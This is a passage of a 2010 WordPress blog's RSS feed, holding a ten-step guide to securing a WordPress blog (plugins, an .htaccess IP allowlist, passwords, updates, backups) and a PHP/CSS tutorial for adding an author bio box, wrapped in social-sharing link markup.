		<li class="shr-googlebuzz">
			<a href="http://www.shareaholic.com/api/share/?title=Have+You+Ever+Been+Hacked%3F+Simple+Mistakes+to+Avoid+%26+How+to+Recover&amp;link=http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/&amp;notes=WordPress%20is%20the%20most%20popular%20blogging%20platform%20in%20the%20world%20with%20over%206%20Million%20downloads%20so%20far%20%28See%20why%20I%20like%20wordpress%20here%29%20and%20because%20its%20so%20popular%2C%20you%20know%20the%20bad%20guys%20will%20begin%20to%20target%20its%20users.%20Hacking%20is%20a%20very%20serious%20issue%20that%20can%20cripple%20any%20website%20and%20erase%20a%20hard%20earned%20sou&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=257&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=Have+You+Ever+Been+Hacked%3F+Simple+Mistakes+to+Avoid+%26+How+to+Recover&amp;link=http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/&amp;notes=WordPress%20is%20the%20most%20popular%20blogging%20platform%20in%20the%20world%20with%20over%206%20Million%20downloads%20so%20far%20%28See%20why%20I%20like%20wordpress%20here%29%20and%20because%20its%20so%20popular%2C%20you%20know%20the%20bad%20guys%20will%20begin%20to%20target%20its%20users.%20Hacking%20is%20a%20very%20serious%20issue%20that%20can%20cripple%20any%20website%20and%20erase%20a%20hard%20earned%20sou&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=Have+You+Ever+Been+Hacked%3F+Simple+Mistakes+to+Avoid+%26+How+to+Recover&amp;link=http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/&amp;notes=WordPress%20is%20the%20most%20popular%20blogging%20platform%20in%20the%20world%20with%20over%206%20Million%20downloads%20so%20far%20%28See%20why%20I%20like%20wordpress%20here%29%20and%20because%20its%20so%20popular%2C%20you%20know%20the%20bad%20guys%20will%20begin%20to%20target%20its%20users.%20Hacking%20is%20a%20very%20serious%20issue%20that%20can%20cripple%20any%20website%20and%20erase%20a%20hard%20earned%20sou&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=Have+You+Ever+Been+Hacked%3F+Simple+Mistakes+to+Avoid+%26+How+to+Recover&amp;link=http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/&amp;notes=WordPress%20is%20the%20most%20popular%20blogging%20platform%20in%20the%20world%20with%20over%206%20Million%20downloads%20so%20far%20%28See%20why%20I%20like%20wordpress%20here%29%20and%20because%20its%20so%20popular%2C%20you%20know%20the%20bad%20guys%20will%20begin%20to%20target%20its%20users.%20Hacking%20is%20a%20very%20serious%20issue%20that%20can%20cripple%20any%20website%20and%20erase%20a%20hard%20earned%20sou&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=Have+You+Ever+Been+Hacked%3F+Simple+Mistakes+to+Avoid+%26+How+to+Recover&amp;link=http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/&amp;notes=WordPress%20is%20the%20most%20popular%20blogging%20platform%20in%20the%20world%20with%20over%206%20Million%20downloads%20so%20far%20%28See%20why%20I%20like%20wordpress%20here%29%20and%20because%20its%20so%20popular%2C%20you%20know%20the%20bad%20guys%20will%20begin%20to%20target%20its%20users.%20Hacking%20is%20a%20very%20serious%20issue%20that%20can%20cripple%20any%20website%20and%20erase%20a%20hard%20earned%20sou&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=Have+You+Ever+Been+Hacked%3F+Simple+Mistakes+to+Avoid+%26+How+to+Recover&amp;link=http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/&amp;notes=WordPress%20is%20the%20most%20popular%20blogging%20platform%20in%20the%20world%20with%20over%206%20Million%20downloads%20so%20far%20%28See%20why%20I%20like%20wordpress%20here%29%20and%20because%20its%20so%20popular%2C%20you%20know%20the%20bad%20guys%20will%20begin%20to%20target%20its%20users.%20Hacking%20is%20a%20very%20serious%20issue%20that%20can%20cripple%20any%20website%20and%20erase%20a%20hard%20earned%20sou&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-blogengage">
			<a href="http://www.shareaholic.com/api/share/?title=Have+You+Ever+Been+Hacked%3F+Simple+Mistakes+to+Avoid+%26+How+to+Recover&amp;link=http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/&amp;notes=WordPress%20is%20the%20most%20popular%20blogging%20platform%20in%20the%20world%20with%20over%206%20Million%20downloads%20so%20far%20%28See%20why%20I%20like%20wordpress%20here%29%20and%20because%20its%20so%20popular%2C%20you%20know%20the%20bad%20guys%20will%20begin%20to%20target%20its%20users.%20Hacking%20is%20a%20very%20serious%20issue%20that%20can%20cripple%20any%20website%20and%20erase%20a%20hard%20earned%20sou&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=286&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/feed/</wfw:commentRss>
		<slash:comments>26</slash:comments>
		</item>
		<item>
		<title>10 Simple Steps to Secure &amp; Protect your WordPress Blog</title>
		<link>http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/</link>
		<comments>http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/#comments</comments>
		<pubDate>Sat, 20 Mar 2010 22:14:05 +0000</pubDate>
		<dc:creator>Sam</dc:creator>
				<category><![CDATA[Blogging & SEO]]></category>
		<category><![CDATA[Other Tutorials]]></category>
		<category><![CDATA[Security Tutorials]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[internet security]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[protection]]></category>
		<category><![CDATA[simple]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://samswebguide.com/?p=409</guid>
		<description><![CDATA[As of the beginning of 2009 there were approximately 133 Million blogs online. This is a pretty large market and also the perfect playground for unscrupulous persons who live for spamming, scamming and just creating malicious programs that can seriously compromise and disable unsuspecting sites. As wordpress blog owners, we need to do everything possible ...]]></description>
			<content:encoded><![CDATA[<p>As of the beginning of 2009 there were approximately <img class="alignright size-full wp-image-423" title="Secure &amp; Protect  WordPress" src="http://samswebguide.com/wp-content/uploads/2010/03/wordpress-secure.jpg" alt="Secure &amp; Protect WordPress" width="165" height="138" /><br />
133 Million blogs online. This is a pretty large market and also the perfect playground for unscrupulous persons who live for spamming, scamming and just creating malicious programs that can seriously compromise and disable unsuspecting sites. As wordpress blog owners, we need to do everything possible to ensure that our sites are never exploited.</p>
<p><span id="more-409"></span>Here are 10 very simple steps, tools and tips to ensure that your blog can withstand malicious attacks and not be overrun with spam.<strong></strong></p>
<h3><strong><span style="color: #993300;">1. Use the Login Lockdown Plugin</span></strong></h3>
<p>Hackers can easily crack your password and other login credentials by using Brute Force Attacks (<a title="Wikipedia - Brute Force Attacks" href="http://en.wikipedia.org/wiki/Brute_force_attack" target="_blank">Click here for a definition</a>). This plugin adds an extra security feature to WordPress by restricting the rate at which  failed logins can be re-attempted from a given IP range. This plugin can be downloaded from <a title="Login Lockdown Security" href="http://www.bad-neighborhood.com/" target="_blank">Bad Neighborhood</a></p>
<h3><span style="color: #993300;"><strong>2. Delete Unused Plugins </strong></span></h3>
<p><strong> </strong>Always ensure to delete unused plugins as these can provide loop holes that can be easily exploited<strong>.</strong></p>
<h3><span style="color: #993300;"><strong>3. Secure the /wp-admin/ Directory using .htaccess </strong></span></h3>
<p><strong> </strong>I found this one on google&#8217;s Matt Cutts&#8217; blog. Secure your /wp-admin/ directory by using a .htaccess file to allow access from specific IP addresses only. Create a new  .htaccess file, which you can place directly in /wp-admin/.htaccess.</p>
<p>This is what the .htaccess file contains:</p>
<blockquote><p>AuthUserFile /dev/null<br />
AuthGroupFile /dev/null<br />
AuthName “Access Control”<br />
AuthType Basic<br />
order deny,allow<br />
deny from all<br />
# whitelist home IP address<br />
allow from 111.111.111.111<br />
# whitelist work IP address<br />
allow from 111.111.111.111<br />
allow from 111.111.111.111</p></blockquote>
<p>Replace the 111.111.111.111 with the IPs you would like to whitelist. This  file says that the IP address 111.111.111.111 (and the other IP addresses whitelisted) are allowed to access /wp-admin/, but all other  IP addresses are denied access. The &#8216;#&#8217; lines are just notes and can be changed to suit your need.</p>
<h3><span style="color: #993300;"><strong>4. WordPress Security Scanner Plugin</strong></span></h3>
<p>Install this plugin to help detect any loop holes that may exist in your database and blog files. It provides a report on what needs to be done to prevent attacks. This one is very useful and can be downloaded here: <a title="Wordpress Security Scan" onclick="javascript:pageTracker._trackPageview('/outbound/article/http://wordpress.org/extend/plugins/wp-security-scan/');" href="http://wordpress.org/extend/plugins/wp-security-scan/" target="_blank">WP-Security-Scan</a></p>
<h3><span style="color: #993300;"><strong>5. Limited Blog Registration Access </strong></span></h3>
<p>If your blog accepts registration, ensure that a user cannot immediately register and receive an administrative access. To change this, go to your Settings option in the wordpress dashboard, select General. Then change the New User Default Role to Contributor<strong>.</strong> This can easily be changed as the need arise.<strong> </strong>User privileges can also be assigned using the <a title="Role Manager Plugin" onclick="javascript:pageTracker._trackPageview('/outbound/article/http://redalt.com/Resources/Plugins/Role+Manager');" href="http://redalt.com/Resources/Plugins/Role+Manager" target="_blank">Role-Manager</a> plugin.</p>
<h3><span style="color: #993300;"><strong>6. Change Your Login Name </strong></span></h3>
<p><strong> </strong>The default wordpress username is <em>admin</em> and hackers will always try to infiltrate using this default. So make it harder for them by changing it.</p>
<p>In your WordPress dashboard, go to <em>Users</em> and set up a new  user account. Give this new user <em>administrator</em> role. Log out  and log in again with the new user account.</p>
<p>Go to <em>Users</em> again. This time, check the box beside <em>admin</em> and press <em>Delete</em>.  When it asks for deletion confirmation,  select the “<em>Attribute all posts and links to:</em>” and select your  new username from the dropdown bar. This will transfer all the posts to  your new user account. Press <em>Confirm Deletion</em></p>
<h3><span style="color: #993300;"><strong>7. Use a Very Strong Password </strong></span></h3>
<p>Ensure that you use a strong password that is difficult for others to  guess. Use a combination of digits, special characters and upper/lower  case letters to form your password.</p>
<h3><span style="color: #993300;"><strong>8. Always Upgrade to the Latest WordPress Version </strong></span></h3>
<p><strong> </strong>The latest version of WordPress always contains bug fixes for any  security vulnerabilities, therefore it is very important to keep your blog updated at all times. The latest version at the time of this post is 2.9.2 and can be <a title="Wordpress 2.9.2" href="http://wordpress.org/download/" target="_blank">downloaded here</a><a onclick="javascript:pageTracker._trackPageview('/outbound/article/http://wordpress.org/download/');" href="http://wordpress.org/download/" target="_blank">.</a></p>
<h3><span style="color: #993300;"><strong>9. Install the Akismet Plugin</strong></span></h3>
<p>Once installed, Akismet checks  your comments against the Akismet web service to see if  they look like  spam or not and prevents them from being published. Spam is stored in a  separate folder where you can review all that is caught. This can be  downloaded from <a title="Akismet Anti-Spam" href="http://www.akismet.com/" target="_blank">Akismet.com</a></p>
<h3><span style="color: #993300;"><strong>10. Backup Your WordPress Database </strong></span></h3>
<p><strong></strong>There is a free plugin that can schedule backups of your database to reduce the risk of loss of data. This can be downloaded here<strong>: </strong><a title="Wordpress Database Backup" onclick="javascript:pageTracker._trackPageview('/outbound/article/http://wordpress.org/extend/plugins/wp-db-backup/');" href="http://wordpress.org/extend/plugins/wp-db-backup/" target="_blank">WP-Database-Backup</a></p>
<p>Yeah, I know its a pretty tedious ToDo list but invest the time to secure a robust wordpress blog<strong>. </strong>It will cost 100 times more to recover from a malicious attack. Think about down-time, lost revenue, loss of trust from your readers, hiring a professional to get rid of malicious code, loss of information, loss of integrity and the list goes on forever.</p>
<h3><strong><span style="color: #333399;">Are you doing what it takes to secure and protect your presence online? If not, now is the time to do so. If you have any additional ideas on how to protect a wordpress blog please leave a comment to let us know.</span><br />
</strong></h3>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=10+Simple+Steps+to+Secure+%26+Protect+your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/&amp;notes=As%20of%20the%20beginning%20of%202009%20there%20were%20approximately%20%0D%0A133%20Million%20blogs%20online.%20This%20is%20a%20pretty%20large%20market%20and%20also%20the%20perfect%20playground%20for%20unscrupulous%20persons%20who%20live%20for%20spamming%2C%20scamming%20and%20just%20creating%20malicious%20programs%20that%20can%20seriously%20compromise%20and%20disable%20unsuspecting%20sites.%20A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%2524%257Btitle%257D%2B-%2B%2524%257Bshort_link%257D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=10+Simple+Steps+to+Secure+%26+Protect+your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/&amp;notes=As%20of%20the%20beginning%20of%202009%20there%20were%20approximately%20%0D%0A133%20Million%20blogs%20online.%20This%20is%20a%20pretty%20large%20market%20and%20also%20the%20perfect%20playground%20for%20unscrupulous%20persons%20who%20live%20for%20spamming%2C%20scamming%20and%20just%20creating%20malicious%20programs%20that%20can%20seriously%20compromise%20and%20disable%20unsuspecting%20sites.%20A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.shareaholic.com/api/share/?title=10+Simple+Steps+to+Secure+%26+Protect+your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/&amp;notes=As%20of%20the%20beginning%20of%202009%20there%20were%20approximately%20%0D%0A133%20Million%20blogs%20online.%20This%20is%20a%20pretty%20large%20market%20and%20also%20the%20perfect%20playground%20for%20unscrupulous%20persons%20who%20live%20for%20spamming%2C%20scamming%20and%20just%20creating%20malicious%20programs%20that%20can%20seriously%20compromise%20and%20disable%20unsuspecting%20sites.%20A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=257&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=10+Simple+Steps+to+Secure+%26+Protect+your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/&amp;notes=As%20of%20the%20beginning%20of%202009%20there%20were%20approximately%20%0D%0A133%20Million%20blogs%20online.%20This%20is%20a%20pretty%20large%20market%20and%20also%20the%20perfect%20playground%20for%20unscrupulous%20persons%20who%20live%20for%20spamming%2C%20scamming%20and%20just%20creating%20malicious%20programs%20that%20can%20seriously%20compromise%20and%20disable%20unsuspecting%20sites.%20A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=10+Simple+Steps+to+Secure+%26+Protect+your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/&amp;notes=As%20of%20the%20beginning%20of%202009%20there%20were%20approximately%20%0D%0A133%20Million%20blogs%20online.%20This%20is%20a%20pretty%20large%20market%20and%20also%20the%20perfect%20playground%20for%20unscrupulous%20persons%20who%20live%20for%20spamming%2C%20scamming%20and%20just%20creating%20malicious%20programs%20that%20can%20seriously%20compromise%20and%20disable%20unsuspecting%20sites.%20A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=10+Simple+Steps+to+Secure+%26+Protect+your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/&amp;notes=As%20of%20the%20beginning%20of%202009%20there%20were%20approximately%20%0D%0A133%20Million%20blogs%20online.%20This%20is%20a%20pretty%20large%20market%20and%20also%20the%20perfect%20playground%20for%20unscrupulous%20persons%20who%20live%20for%20spamming%2C%20scamming%20and%20just%20creating%20malicious%20programs%20that%20can%20seriously%20compromise%20and%20disable%20unsuspecting%20sites.%20A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=10+Simple+Steps+to+Secure+%26+Protect+your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/&amp;notes=As%20of%20the%20beginning%20of%202009%20there%20were%20approximately%20%0D%0A133%20Million%20blogs%20online.%20This%20is%20a%20pretty%20large%20market%20and%20also%20the%20perfect%20playground%20for%20unscrupulous%20persons%20who%20live%20for%20spamming%2C%20scamming%20and%20just%20creating%20malicious%20programs%20that%20can%20seriously%20compromise%20and%20disable%20unsuspecting%20sites.%20A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=10+Simple+Steps+to+Secure+%26+Protect+your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/&amp;notes=As%20of%20the%20beginning%20of%202009%20there%20were%20approximately%20%0D%0A133%20Million%20blogs%20online.%20This%20is%20a%20pretty%20large%20market%20and%20also%20the%20perfect%20playground%20for%20unscrupulous%20persons%20who%20live%20for%20spamming%2C%20scamming%20and%20just%20creating%20malicious%20programs%20that%20can%20seriously%20compromise%20and%20disable%20unsuspecting%20sites.%20A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-blogengage">
			<a href="http://www.shareaholic.com/api/share/?title=10+Simple+Steps+to+Secure+%26+Protect+your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/&amp;notes=As%20of%20the%20beginning%20of%202009%20there%20were%20approximately%20%0D%0A133%20Million%20blogs%20online.%20This%20is%20a%20pretty%20large%20market%20and%20also%20the%20perfect%20playground%20for%20unscrupulous%20persons%20who%20live%20for%20spamming%2C%20scamming%20and%20just%20creating%20malicious%20programs%20that%20can%20seriously%20compromise%20and%20disable%20unsuspecting%20sites.%20A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=286&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/feed/</wfw:commentRss>
		<slash:comments>33</slash:comments>
		</item>
		<item>
		<title>How to Add an About Author Bio Box in the Post Footer in WordPress</title>
		<link>http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/</link>
		<comments>http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/#comments</comments>
		<pubDate>Fri, 19 Mar 2010 13:04:03 +0000</pubDate>
		<dc:creator>Sam</dc:creator>
				<category><![CDATA[Other Tutorials]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[About Author]]></category>
		<category><![CDATA[Author Bio Box]]></category>
		<category><![CDATA[Author Signature WordPress]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[Post Footer]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://samswebguide.com/?p=370</guid>
		<description><![CDATA[This is a very short tutorial on how to add an About Author Bio Box at the end of your posts just like the one at the end of this post. An author box is very important because it further connects with readers by giving a little background information on the author. I spent 2 ...]]></description>
			<content:encoded><![CDATA[<p>This is a very short tutorial on how to add an <strong>About </strong><img class="alignright size-full  wp-image-59" title="wordpress-blue" src="http://samswebguide.com/wp-content/uploads/2010/02/wordpress-blue.png" alt="Wordpress Logo" width="150" height="150" /><br />
<strong>Author Bio Box</strong> at the end of your posts just like the one at the end of this post. An author box is very important because it further connects with readers by giving a little background information on the author. I spent 2 days testing different types of plugins for this purpose but could not find any that worked correctly. So I decided to write the code and then this tutorial.<span id="more-370"></span></p>
<p>This will require that you access 2 of your template files, however, very little coding is required; just copying and pasting, unless you want to make further customization.</p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-875" title="WordPress Author Bio Box" src="http://samswebguide.com/wp-content/uploads/2010/03/author-bio.jpg" alt="WordPress Author Bio Box" width="468" height="134" /></p>
<p>Let&#8217;s get started.</p>
<h3><span style="color: #000000;">Step 1 &#8211; Code to call the Author Biography Info</span></h3>
<p>Copy the code below to your <strong>single.php</strong> (Single Post) file, which is found in WordPress by accessing your Appearance tab then select Editor. Search for the &lt;?php the_content(); ?&gt; line of code, press enter to give some space then copy and paste the code <strong>below that line</strong>, then save:</p>
<pre>&lt;div class="postauthor"&gt;
&lt;?php echo get_avatar( get_the_author_id() , 120 ); ?&gt;
&lt;h4&gt;Article by &lt;a href="&lt;?php the_author_url(); ?&gt;"&gt;
&lt;?php the_author_firstname(); ?&gt; &lt;?php the_author_lastname(); ?&gt;&lt;/a&gt;&lt;/h4&gt;
 &lt;p&gt;&lt;?php the_author_firstname(); ?&gt; has written &lt;strong&gt;&lt;?php the_author_posts(); ?&gt;&lt;/strong&gt; awesome article(s) for us. &lt;br/&gt;&lt;br/&gt;&lt;?php the_author_description(); ?&gt;&lt;/p&gt;
&lt;/div&gt;</pre>
<h3><span style="color: #000000;">Step 2 &#8211; CSS Files</span></h3>
<p>Copy the CSS code below to your <strong>style.css</strong> or<strong> </strong><strong>custom.css</strong> file. This will control the background color, width and text  alignment. You may change the color schemes as needed to fit your theme.</p>
<pre>/* Author's Bio Box */
.postauthor { background: #F5F5F5; border-top: 1px solid #e1e1e0; border-bottom: 1px solid #e1e1e0; overflow: hidden; padding: 1.5em; }
.postauthor img { border: 5px solid #e2dede; float: left; margin-right: 1.5em; }
.postauthor h4 { color: #666; font-size: 2em; margin-bottom: 5px; }
.postauthor p { color: #515151; font-size: 13px; margin-bottom: 12px; }</pre>
<h3><span style="color: #993300;"><span style="color: #000000;"> </span></span><span style="color: #993300;"><span style="color: #000000;">Step 3 &#8211; Author&#8217;s Bio</span></span></h3>
<p><span style="color: #993300;"><span style="color: #000000;">Add the author&#8217;s bio information in the About Yourself section in the WordPress dashboard. Please note that if you wish to add links to the author&#8217;s bio, they should be entered using the </span></span>&lt;a href=&#8221;http://www.yourdomain.com&#8221;&gt; Your Site&#8217;s Name &lt;/a&gt; format.</p>
<p><span style="color: #993300;"><span style="color: #000000;">That&#8217;s it! I hope this tutorial was simple enough and very helpful.<br />
</span></span></p>
<h3><span style="color: #993300;"><span style="color: #000000;"><span style="color: #000000;">Questions / Suggestions </span></span></span></h3>
<p><span style="color: #993300;"><span style="color: #000000;"><span style="color: #000000;">Please leave a comment and let me know if this works for you, if its simple enough or if you have an idea for improving the code. There is always room for improvement.</span><br />
</span></span></p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Add+an+About+Author+Bio+Box+in+the+Post+Footer+in+Wordpress&amp;link=http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/&amp;notes=This%20is%20a%20very%20short%20tutorial%20on%20how%20to%20add%20an%20About%20%0D%0AAuthor%20Bio%20Box%20at%20the%20end%20of%20your%20posts%20just%20like%20the%20one%20at%20the%20end%20of%20this%20post.%20An%20author%20box%20is%20very%20important%20because%20it%20further%20connects%20with%20readers%20by%20giving%20a%20little%20background%20information%20on%20the%20author.%20I%20spent%202%20days%20testing%20different&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%2524%257Btitle%257D%2B-%2B%2524%257Bshort_link%257D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Add+an+About+Author+Bio+Box+in+the+Post+Footer+in+Wordpress&amp;link=http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/&amp;notes=This%20is%20a%20very%20short%20tutorial%20on%20how%20to%20add%20an%20About%20%0D%0AAuthor%20Bio%20Box%20at%20the%20end%20of%20your%20posts%20just%20like%20the%20one%20at%20the%20end%20of%20this%20post.%20An%20author%20box%20is%20very%20important%20because%20it%20further%20connects%20with%20readers%20by%20giving%20a%20little%20background%20information%20on%20the%20author.%20I%20spent%202%20days%20testing%20different&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebuzz">
